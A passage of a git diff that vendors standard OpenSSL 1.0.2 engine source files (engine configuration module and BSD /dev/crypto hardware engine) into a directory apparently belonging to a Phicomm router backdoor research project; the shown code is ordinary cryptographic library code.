+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+#include <openssl/conf.h>
+
+/* #define ENGINE_CONF_DEBUG */
+
+/* ENGINE config module */
+
+static char *skip_dot(char *name)
+{
+    char *p;
+    p = strchr(name, '.');
+    if (p)
+        return p + 1;
+    return name;
+}
+
+static STACK_OF(ENGINE) *initialized_engines = NULL;
+
+static int int_engine_init(ENGINE *e)
+{
+    if (!ENGINE_init(e))
+        return 0;
+    if (!initialized_engines)
+        initialized_engines = sk_ENGINE_new_null();
+    if (!initialized_engines || !sk_ENGINE_push(initialized_engines, e)) {
+        ENGINE_finish(e);
+        return 0;
+    }
+    return 1;
+}
+
+static int int_engine_configure(char *name, char *value, const CONF *cnf)
+{
+    int i;
+    int ret = 0;
+    long do_init = -1;
+    STACK_OF(CONF_VALUE) *ecmds;
+    CONF_VALUE *ecmd = NULL;
+    char *ctrlname, *ctrlvalue;
+    ENGINE *e = NULL;
+    int soft = 0;
+
+    name = skip_dot(name);
+#ifdef ENGINE_CONF_DEBUG
+    fprintf(stderr, "Configuring engine %s\n", name);
+#endif
+    /* Value is a section containing ENGINE commands */
+    ecmds = NCONF_get_section(cnf, value);
+
+    if (!ecmds) {
+        ENGINEerr(ENGINE_F_INT_ENGINE_CONFIGURE,
+                  ENGINE_R_ENGINE_SECTION_ERROR);
+        return 0;
+    }
+
+    for (i = 0; i < sk_CONF_VALUE_num(ecmds); i++) {
+        ecmd = sk_CONF_VALUE_value(ecmds, i);
+        ctrlname = skip_dot(ecmd->name);
+        ctrlvalue = ecmd->value;
+#ifdef ENGINE_CONF_DEBUG
+        fprintf(stderr, "ENGINE conf: doing ctrl(%s,%s)\n", ctrlname,
+                ctrlvalue);
+#endif
+
+        /* First handle some special pseudo ctrls */
+
+        /* Override engine name to use */
+        if (!strcmp(ctrlname, "engine_id"))
+            name = ctrlvalue;
+        else if (!strcmp(ctrlname, "soft_load"))
+            soft = 1;
+        /* Load a dynamic ENGINE */
+        else if (!strcmp(ctrlname, "dynamic_path")) {
+            e = ENGINE_by_id("dynamic");
+            if (!e)
+                goto err;
+            if (!ENGINE_ctrl_cmd_string(e, "SO_PATH", ctrlvalue, 0))
+                goto err;
+            if (!ENGINE_ctrl_cmd_string(e, "LIST_ADD", "2", 0))
+                goto err;
+            if (!ENGINE_ctrl_cmd_string(e, "LOAD", NULL, 0))
+                goto err;
+        }
+        /* ... add other pseudos here ... */
+        else {
+            /*
+             * At this point we need an ENGINE structural reference if we
+             * don't already have one.
+             */
+            if (!e) {
+                e = ENGINE_by_id(name);
+                if (!e && soft) {
+                    ERR_clear_error();
+                    return 1;
+                }
+                if (!e)
+                    goto err;
+            }
+            /*
+             * Allow "EMPTY" to mean no value: this allows a valid "value" to
+             * be passed to ctrls of type NO_INPUT
+             */
+            if (!strcmp(ctrlvalue, "EMPTY"))
+                ctrlvalue = NULL;
+            if (!strcmp(ctrlname, "init")) {
+                if (!NCONF_get_number_e(cnf, value, "init", &do_init))
+                    goto err;
+                if (do_init == 1) {
+                    if (!int_engine_init(e))
+                        goto err;
+                } else if (do_init != 0) {
+                    ENGINEerr(ENGINE_F_INT_ENGINE_CONFIGURE,
+                              ENGINE_R_INVALID_INIT_VALUE);
+                    goto err;
+                }
+            } else if (!strcmp(ctrlname, "default_algorithms")) {
+                if (!ENGINE_set_default_string(e, ctrlvalue))
+                    goto err;
+            } else if (!ENGINE_ctrl_cmd_string(e, ctrlname, ctrlvalue, 0))
+                goto err;
+        }
+
+    }
+    if (e && (do_init == -1) && !int_engine_init(e)) {
+        ecmd = NULL;
+        goto err;
+    }
+    ret = 1;
+ err:
+    if (ret != 1) {
+        ENGINEerr(ENGINE_F_INT_ENGINE_CONFIGURE,
+                  ENGINE_R_ENGINE_CONFIGURATION_ERROR);
+        if (ecmd)
+            ERR_add_error_data(6, "section=", ecmd->section,
+                               ", name=", ecmd->name,
+                               ", value=", ecmd->value);
+    }
+    if (e)
+        ENGINE_free(e);
+    return ret;
+}
+
+static int int_engine_module_init(CONF_IMODULE *md, const CONF *cnf)
+{
+    STACK_OF(CONF_VALUE) *elist;
+    CONF_VALUE *cval;
+    int i;
+#ifdef ENGINE_CONF_DEBUG
+    fprintf(stderr, "Called engine module: name %s, value %s\n",
+            CONF_imodule_get_name(md), CONF_imodule_get_value(md));
+#endif
+    /* Value is a section containing ENGINEs to configure */
+    elist = NCONF_get_section(cnf, CONF_imodule_get_value(md));
+
+    if (!elist) {
+        ENGINEerr(ENGINE_F_INT_ENGINE_MODULE_INIT,
+                  ENGINE_R_ENGINES_SECTION_ERROR);
+        return 0;
+    }
+
+    for (i = 0; i < sk_CONF_VALUE_num(elist); i++) {
+        cval = sk_CONF_VALUE_value(elist, i);
+        if (!int_engine_configure(cval->name, cval->value, cnf))
+            return 0;
+    }
+
+    return 1;
+}
+
+static void int_engine_module_finish(CONF_IMODULE *md)
+{
+    ENGINE *e;
+    while ((e = sk_ENGINE_pop(initialized_engines)))
+        ENGINE_finish(e);
+    sk_ENGINE_free(initialized_engines);
+    initialized_engines = NULL;
+}
+
+void ENGINE_add_conf_module(void)
+{
+    CONF_module_add("engines",
+                    int_engine_module_init, int_engine_module_finish);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_cryptodev.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_cryptodev.c
new file mode 100644
index 0000000..926d95c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_cryptodev.c
@@ -0,0 +1,1532 @@
+/*
+ * Copyright (c) 2002 Bob Beck <beck@openbsd.org>
+ * Copyright (c) 2002 Theo de Raadt
+ * Copyright (c) 2002 Markus Friedl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ * DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY
+ * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+ * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
+ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ *
+ */
+
+#include <openssl/objects.h>
+#include <openssl/engine.h>
+#include <openssl/evp.h>
+#include <openssl/bn.h>
+
+#if (defined(__unix__) || defined(unix)) && !defined(USG) && \
+        (defined(OpenBSD) || defined(__FreeBSD__))
+# include <sys/param.h>
+# if (OpenBSD >= 200112) || ((__FreeBSD_version >= 470101 && __FreeBSD_version < 500000) || __FreeBSD_version >= 500041)
+#  define HAVE_CRYPTODEV
+# endif
+# if (OpenBSD >= 200110)
+#  define HAVE_SYSLOG_R
+# endif
+#endif
+
+#ifndef HAVE_CRYPTODEV
+
+void ENGINE_load_cryptodev(void)
+{
+    /* This is a NOP on platforms without /dev/crypto */
+    return;
+}
+
+#else
+
+# include <sys/types.h>
+# include <crypto/cryptodev.h>
+# include <openssl/dh.h>
+# include <openssl/dsa.h>
+# include <openssl/err.h>
+# include <openssl/rsa.h>
+# include <sys/ioctl.h>
+# include <errno.h>
+# include <stdio.h>
+# include <unistd.h>
+# include <fcntl.h>
+# include <stdarg.h>
+# include <syslog.h>
+# include <errno.h>
+# include <string.h>
+
+struct dev_crypto_state {
+    struct session_op d_sess;
+    int d_fd;
+# ifdef USE_CRYPTODEV_DIGESTS
+    char dummy_mac_key[HASH_MAX_LEN];
+    unsigned char digest_res[HASH_MAX_LEN];
+    char *mac_data;
+    int mac_len;
+# endif
+};
+
+static u_int32_t cryptodev_asymfeat = 0;
+
+static int get_asym_dev_crypto(void);
+static int open_dev_crypto(void);
+static int get_dev_crypto(void);
+static int get_cryptodev_ciphers(const int **cnids);
+# ifdef USE_CRYPTODEV_DIGESTS
+static int get_cryptodev_digests(const int **cnids);
+# endif
+static int cryptodev_usable_ciphers(const int **nids);
+static int cryptodev_usable_digests(const int **nids);
+static int cryptodev_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t inl);
+static int cryptodev_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                              const unsigned char *iv, int enc);
+static int cryptodev_cleanup(EVP_CIPHER_CTX *ctx);
+static int cryptodev_engine_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                                    const int **nids, int nid);
+static int cryptodev_engine_digests(ENGINE *e, const EVP_MD **digest,
+                                    const int **nids, int nid);
+static int bn2crparam(const BIGNUM *a, struct crparam *crp);
+static int crparam2bn(struct crparam *crp, BIGNUM *a);
+static void zapparams(struct crypt_kop *kop);
+static int cryptodev_asym(struct crypt_kop *kop, int rlen, BIGNUM *r,
+                          int slen, BIGNUM *s);
+
+static int cryptodev_bn_mod_exp(BIGNUM *r, const BIGNUM *a,
+                                const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                                BN_MONT_CTX *m_ctx);
+static int cryptodev_rsa_nocrt_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                                       BN_CTX *ctx);
+static int cryptodev_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                                 BN_CTX *ctx);
+static int cryptodev_dsa_bn_mod_exp(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                                    const BIGNUM *p, const BIGNUM *m,
+                                    BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+static int cryptodev_dsa_dsa_mod_exp(DSA *dsa, BIGNUM *t1, BIGNUM *g,
+                                     BIGNUM *u1, BIGNUM *pub_key, BIGNUM *u2,
+                                     BIGNUM *p, BN_CTX *ctx,
+                                     BN_MONT_CTX *mont);
+static DSA_SIG *cryptodev_dsa_do_sign(const unsigned char *dgst, int dlen,
+                                      DSA *dsa);
+static int cryptodev_dsa_verify(const unsigned char *dgst, int dgst_len,
+                                DSA_SIG *sig, DSA *dsa);
+static int cryptodev_mod_exp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                                const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                                BN_MONT_CTX *m_ctx);
+static int cryptodev_dh_compute_key(unsigned char *key, const BIGNUM *pub_key,
+                                    DH *dh);
+static int cryptodev_ctrl(ENGINE *e, int cmd, long i, void *p,
+                          void (*f) (void));
+void ENGINE_load_cryptodev(void);
+
+static const ENGINE_CMD_DEFN cryptodev_defns[] = {
+    {0, NULL, NULL, 0}
+};
+
+static struct {
+    int id;
+    int nid;
+    int ivmax;
+    int keylen;
+} ciphers[] = {
+    {
+        CRYPTO_ARC4, NID_rc4, 0, 16,
+    },
+    {
+        CRYPTO_DES_CBC, NID_des_cbc, 8, 8,
+    },
+    {
+        CRYPTO_3DES_CBC, NID_des_ede3_cbc, 8, 24,
+    },
+    {
+        CRYPTO_AES_CBC, NID_aes_128_cbc, 16, 16,
+    },
+    {
+        CRYPTO_AES_CBC, NID_aes_192_cbc, 16, 24,
+    },
+    {
+        CRYPTO_AES_CBC, NID_aes_256_cbc, 16, 32,
+    },
+# ifdef CRYPTO_AES_CTR
+    {
+        CRYPTO_AES_CTR, NID_aes_128_ctr, 14, 16,
+    },
+    {
+        CRYPTO_AES_CTR, NID_aes_192_ctr, 14, 24,
+    },
+    {
+        CRYPTO_AES_CTR, NID_aes_256_ctr, 14, 32,
+    },
+# endif
+    {
+        CRYPTO_BLF_CBC, NID_bf_cbc, 8, 16,
+    },
+    {
+        CRYPTO_CAST_CBC, NID_cast5_cbc, 8, 16,
+    },
+    {
+        CRYPTO_SKIPJACK_CBC, NID_undef, 0, 0,
+    },
+    {
+        0, NID_undef, 0, 0,
+    },
+};
+
+# ifdef USE_CRYPTODEV_DIGESTS
+static struct {
+    int id;
+    int nid;
+    int keylen;
+} digests[] = {
+    {
+        CRYPTO_MD5_HMAC, NID_hmacWithMD5, 16
+    },
+    {
+        CRYPTO_SHA1_HMAC, NID_hmacWithSHA1, 20
+    },
+    {
+        CRYPTO_RIPEMD160_HMAC, NID_ripemd160, 16
+        /* ? */
+    },
+    {
+        CRYPTO_MD5_KPDK, NID_undef, 0
+    },
+    {
+        CRYPTO_SHA1_KPDK, NID_undef, 0
+    },
+    {
+        CRYPTO_MD5, NID_md5, 16
+    },
+    {
+        CRYPTO_SHA1, NID_sha1, 20
+    },
+    {
+        0, NID_undef, 0
+    },
+};
+# endif
+
+/*
+ * Return a fd if /dev/crypto seems usable, 0 otherwise.
+ */
+static int open_dev_crypto(void)
+{
+    static int fd = -1;
+
+    if (fd == -1) {
+        if ((fd = open("/dev/crypto", O_RDWR, 0)) == -1)
+            return (-1);
+        /* close on exec */
+        if (fcntl(fd, F_SETFD, 1) == -1) {
+            close(fd);
+            fd = -1;
+            return (-1);
+        }
+    }
+    return (fd);
+}
+
+static int get_dev_crypto(void)
+{
+    int fd, retfd;
+
+    if ((fd = open_dev_crypto()) == -1)
+        return (-1);
+# ifndef CRIOGET_NOT_NEEDED
+    if (ioctl(fd, CRIOGET, &retfd) == -1)
+        return (-1);
+
+    /* close on exec */
+    if (fcntl(retfd, F_SETFD, 1) == -1) {
+        close(retfd);
+        return (-1);
+    }
+# else
+    retfd = fd;
+# endif
+    return (retfd);
+}
+
+static void put_dev_crypto(int fd)
+{
+# ifndef CRIOGET_NOT_NEEDED
+    close(fd);
+# endif
+}
+
+/* Caching version for asym operations */
+static int get_asym_dev_crypto(void)
+{
+    static int fd = -1;
+
+    if (fd == -1)
+        fd = get_dev_crypto();
+    return fd;
+}
+
+/*
+ * Find out what ciphers /dev/crypto will let us have a session for.
+ * XXX note, that some of these openssl doesn't deal with yet!
+ * returning them here is harmless, as long as we return NULL
+ * when asked for a handler in the cryptodev_engine_ciphers routine
+ */
+static int get_cryptodev_ciphers(const int **cnids)
+{
+    static int nids[CRYPTO_ALGORITHM_MAX];
+    struct session_op sess;
+    int fd, i, count = 0;
+
+    if ((fd = get_dev_crypto()) < 0) {
+        *cnids = NULL;
+        return (0);
+    }
+    memset(&sess, 0, sizeof(sess));
+    sess.key = (caddr_t) "123456789abcdefghijklmno";
+
+    for (i = 0; ciphers[i].id && count < CRYPTO_ALGORITHM_MAX; i++) {
+        if (ciphers[i].nid == NID_undef)
+            continue;
+        sess.cipher = ciphers[i].id;
+        sess.keylen = ciphers[i].keylen;
+        sess.mac = 0;
+        if (ioctl(fd, CIOCGSESSION, &sess) != -1 &&
+            ioctl(fd, CIOCFSESSION, &sess.ses) != -1)
+            nids[count++] = ciphers[i].nid;
+    }
+    put_dev_crypto(fd);
+
+    if (count > 0)
+        *cnids = nids;
+    else
+        *cnids = NULL;
+    return (count);
+}
+
+# ifdef USE_CRYPTODEV_DIGESTS
+/*
+ * Find out what digests /dev/crypto will let us have a session for.
+ * XXX note, that some of these openssl doesn't deal with yet!
+ * returning them here is harmless, as long as we return NULL
+ * when asked for a handler in the cryptodev_engine_digests routine
+ */
+static int get_cryptodev_digests(const int **cnids)
+{
+    static int nids[CRYPTO_ALGORITHM_MAX];
+    struct session_op sess;
+    int fd, i, count = 0;
+
+    if ((fd = get_dev_crypto()) < 0) {
+        *cnids = NULL;
+        return (0);
+    }
+    memset(&sess, 0, sizeof(sess));
+    sess.mackey = (caddr_t) "123456789abcdefghijklmno";
+    for (i = 0; digests[i].id && count < CRYPTO_ALGORITHM_MAX; i++) {
+        if (digests[i].nid == NID_undef)
+            continue;
+        sess.mac = digests[i].id;
+        sess.mackeylen = digests[i].keylen;
+        sess.cipher = 0;
+        if (ioctl(fd, CIOCGSESSION, &sess) != -1 &&
+            ioctl(fd, CIOCFSESSION, &sess.ses) != -1)
+            nids[count++] = digests[i].nid;
+    }
+    put_dev_crypto(fd);
+
+    if (count > 0)
+        *cnids = nids;
+    else
+        *cnids = NULL;
+    return (count);
+}
+# endif                         /* 0 */
+
+/*
+ * Find the useable ciphers|digests from dev/crypto - this is the first
+ * thing called by the engine init crud which determines what it
+ * can use for ciphers from this engine. We want to return
+ * only what we can do, anythine else is handled by software.
+ *
+ * If we can't initialize the device to do anything useful for
+ * any reason, we want to return a NULL array, and 0 length,
+ * which forces everything to be done is software. By putting
+ * the initalization of the device in here, we ensure we can
+ * use this engine as the default, and if for whatever reason
+ * /dev/crypto won't do what we want it will just be done in
+ * software
+ *
+ * This can (should) be greatly expanded to perhaps take into
+ * account speed of the device, and what we want to do.
+ * (although the disabling of particular alg's could be controlled
+ * by the device driver with sysctl's.) - this is where we
+ * want most of the decisions made about what we actually want
+ * to use from /dev/crypto.
+ */
+static int cryptodev_usable_ciphers(const int **nids)
+{
+    return (get_cryptodev_ciphers(nids));
+}
+
+static int cryptodev_usable_digests(const int **nids)
+{
+# ifdef USE_CRYPTODEV_DIGESTS
+    return (get_cryptodev_digests(nids));
+# else
+    /*
+     * XXXX just disable all digests for now, because it sucks.
+     * we need a better way to decide this - i.e. I may not
+     * want digests on slow cards like hifn on fast machines,
+     * but might want them on slow or loaded machines, etc.
+     * will also want them when using crypto cards that don't
+     * suck moose gonads - would be nice to be able to decide something
+     * as reasonable default without having hackery that's card dependent.
+     * of course, the default should probably be just do everything,
+     * with perhaps a sysctl to turn algoritms off (or have them off
+     * by default) on cards that generally suck like the hifn.
+     */
+    *nids = NULL;
+    return (0);
+# endif
+}
+
+static int
+cryptodev_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                 const unsigned char *in, size_t inl)
+{
+    struct crypt_op cryp;
+    struct dev_crypto_state *state = ctx->cipher_data;
+    struct session_op *sess = &state->d_sess;
+    const void *iiv;
+    unsigned char save_iv[EVP_MAX_IV_LENGTH];
+
+    if (state->d_fd < 0)
+        return (0);
+    if (!inl)
+        return (1);
+    if ((inl % ctx->cipher->block_size) != 0)
+        return (0);
+
+    memset(&cryp, 0, sizeof(cryp));
+
+    cryp.ses = sess->ses;
+    cryp.flags = 0;
+    cryp.len = inl;
+    cryp.src = (caddr_t) in;
+    cryp.dst = (caddr_t) out;
+    cryp.mac = 0;
+
+    cryp.op = ctx->encrypt ? COP_ENCRYPT : COP_DECRYPT;
+
+    if (ctx->cipher->iv_len) {
+        cryp.iv = (caddr_t) ctx->iv;
+        if (!ctx->encrypt) {
+            iiv = in + inl - ctx->cipher->iv_len;
+            memcpy(save_iv, iiv, ctx->cipher->iv_len);
+        }
+    } else
+        cryp.iv = NULL;
+
+    if (ioctl(state->d_fd, CIOCCRYPT, &cryp) == -1) {
+        /*
+         * XXX need better errror handling this can fail for a number of
+         * different reasons.
+         */
+        return (0);
+    }
+
+    if (ctx->cipher->iv_len) {
+        if (ctx->encrypt)
+            iiv = out + inl - ctx->cipher->iv_len;
+        else
+            iiv = save_iv;
+        memcpy(ctx->iv, iiv, ctx->cipher->iv_len);
+    }
+    return (1);
+}
+
+static int
+cryptodev_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                   const unsigned char *iv, int enc)
+{
+    struct dev_crypto_state *state = ctx->cipher_data;
+    struct session_op *sess = &state->d_sess;
+    int cipher = -1, i;
+
+    for (i = 0; ciphers[i].id; i++)
+        if (ctx->cipher->nid == ciphers[i].nid &&
+            ctx->cipher->iv_len <= ciphers[i].ivmax &&
+            ctx->key_len == ciphers[i].keylen) {
+            cipher = ciphers[i].id;
+            break;
+        }
+
+    if (!ciphers[i].id) {
+        state->d_fd = -1;
+        return (0);
+    }
+
+    memset(sess, 0, sizeof(struct session_op));
+
+    if ((state->d_fd = get_dev_crypto()) < 0)
+        return (0);
+
+    sess->key = (caddr_t) key;
+    sess->keylen = ctx->key_len;
+    sess->cipher = cipher;
+
+    if (ioctl(state->d_fd, CIOCGSESSION, sess) == -1) {
+        put_dev_crypto(state->d_fd);
+        state->d_fd = -1;
+        return (0);
+    }
+    return (1);
+}
+
+/*
+ * free anything we allocated earlier when initting a
+ * session, and close the session.
+ */
+static int cryptodev_cleanup(EVP_CIPHER_CTX *ctx)
+{
+    int ret = 0;
+    struct dev_crypto_state *state = ctx->cipher_data;
+    struct session_op *sess = &state->d_sess;
+
+    if (state->d_fd < 0)
+        return (0);
+
+    /*
+     * XXX if this ioctl fails, someting's wrong. the invoker may have called
+     * us with a bogus ctx, or we could have a device that for whatever
+     * reason just doesn't want to play ball - it's not clear what's right
+     * here - should this be an error? should it just increase a counter,
+     * hmm. For right now, we return 0 - I don't believe that to be "right".
+     * we could call the gorpy openssl lib error handlers that print messages
+     * to users of the library. hmm..
+     */
+
+    if (ioctl(state->d_fd, CIOCFSESSION, &sess->ses) == -1) {
+        ret = 0;
+    } else {
+        ret = 1;
+    }
+    put_dev_crypto(state->d_fd);
+    state->d_fd = -1;
+
+    return (ret);
+}
+
+/*
+ * libcrypto EVP stuff - this is how we get wired to EVP so the engine
+ * gets called when libcrypto requests a cipher NID.
+ */
+
+/* RC4 */
+const EVP_CIPHER cryptodev_rc4 = {
+    NID_rc4,
+    1, 16, 0,
+    EVP_CIPH_VARIABLE_LENGTH,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    NULL,
+    NULL,
+    NULL
+};
+
+/* DES CBC EVP */
+const EVP_CIPHER cryptodev_des_cbc = {
+    NID_des_cbc,
+    8, 8, 8,
+    EVP_CIPH_CBC_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+/* 3DES CBC EVP */
+const EVP_CIPHER cryptodev_3des_cbc = {
+    NID_des_ede3_cbc,
+    8, 24, 8,
+    EVP_CIPH_CBC_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+const EVP_CIPHER cryptodev_bf_cbc = {
+    NID_bf_cbc,
+    8, 16, 8,
+    EVP_CIPH_CBC_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+const EVP_CIPHER cryptodev_cast_cbc = {
+    NID_cast5_cbc,
+    8, 16, 8,
+    EVP_CIPH_CBC_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+const EVP_CIPHER cryptodev_aes_cbc = {
+    NID_aes_128_cbc,
+    16, 16, 16,
+    EVP_CIPH_CBC_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+const EVP_CIPHER cryptodev_aes_192_cbc = {
+    NID_aes_192_cbc,
+    16, 24, 16,
+    EVP_CIPH_CBC_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+const EVP_CIPHER cryptodev_aes_256_cbc = {
+    NID_aes_256_cbc,
+    16, 32, 16,
+    EVP_CIPH_CBC_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+# ifdef CRYPTO_AES_CTR
+const EVP_CIPHER cryptodev_aes_ctr = {
+    NID_aes_128_ctr,
+    16, 16, 14,
+    EVP_CIPH_CTR_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+const EVP_CIPHER cryptodev_aes_ctr_192 = {
+    NID_aes_192_ctr,
+    16, 24, 14,
+    EVP_CIPH_CTR_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+
+const EVP_CIPHER cryptodev_aes_ctr_256 = {
+    NID_aes_256_ctr,
+    16, 32, 14,
+    EVP_CIPH_CTR_MODE,
+    cryptodev_init_key,
+    cryptodev_cipher,
+    cryptodev_cleanup,
+    sizeof(struct dev_crypto_state),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL
+};
+# endif
+/*
+ * Registered by the ENGINE when used to find out how to deal with
+ * a particular NID in the ENGINE. this says what we'll do at the
+ * top level - note, that list is restricted by what we answer with
+ */
+static int
+cryptodev_engine_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                         const int **nids, int nid)
+{
+    if (!cipher)
+        return (cryptodev_usable_ciphers(nids));
+
+    switch (nid) {
+    case NID_rc4:
+        *cipher = &cryptodev_rc4;
+        break;
+    case NID_des_ede3_cbc:
+        *cipher = &cryptodev_3des_cbc;
+        break;
+    case NID_des_cbc:
+        *cipher = &cryptodev_des_cbc;
+        break;
+    case NID_bf_cbc:
+        *cipher = &cryptodev_bf_cbc;
+        break;
+    case NID_cast5_cbc:
+        *cipher = &cryptodev_cast_cbc;
+        break;
+    case NID_aes_128_cbc:
+        *cipher = &cryptodev_aes_cbc;
+        break;
+    case NID_aes_192_cbc:
+        *cipher = &cryptodev_aes_192_cbc;
+        break;
+    case NID_aes_256_cbc:
+        *cipher = &cryptodev_aes_256_cbc;
+        break;
+# ifdef CRYPTO_AES_CTR
+    case NID_aes_128_ctr:
+        *cipher = &cryptodev_aes_ctr;
+        break;
+    case NID_aes_192_ctr:
+        *cipher = &cryptodev_aes_ctr_192;
+        break;
+    case NID_aes_256_ctr:
+        *cipher = &cryptodev_aes_ctr_256;
+        break;
+# endif
+    default:
+        *cipher = NULL;
+        break;
+    }
+    return (*cipher != NULL);
+}
+
+# ifdef USE_CRYPTODEV_DIGESTS
+
+/* convert digest type to cryptodev */
+static int digest_nid_to_cryptodev(int nid)
+{
+    int i;
+
+    for (i = 0; digests[i].id; i++)
+        if (digests[i].nid == nid)
+            return (digests[i].id);
+    return (0);
+}
+
+static int digest_key_length(int nid)
+{
+    int i;
+
+    for (i = 0; digests[i].id; i++)
+        if (digests[i].nid == nid)
+            return digests[i].keylen;
+    return (0);
+}
+
+static int cryptodev_digest_init(EVP_MD_CTX *ctx)
+{
+    struct dev_crypto_state *state = ctx->md_data;
+    struct session_op *sess = &state->d_sess;
+    int digest;
+
+    if ((digest = digest_nid_to_cryptodev(ctx->digest->type)) == NID_undef) {
+        printf("cryptodev_digest_init: Can't get digest \n");
+        return (0);
+    }
+
+    memset(state, 0, sizeof(struct dev_crypto_state));
+
+    if ((state->d_fd = get_dev_crypto()) < 0) {
+        printf("cryptodev_digest_init: Can't get Dev \n");
+        return (0);
+    }
+
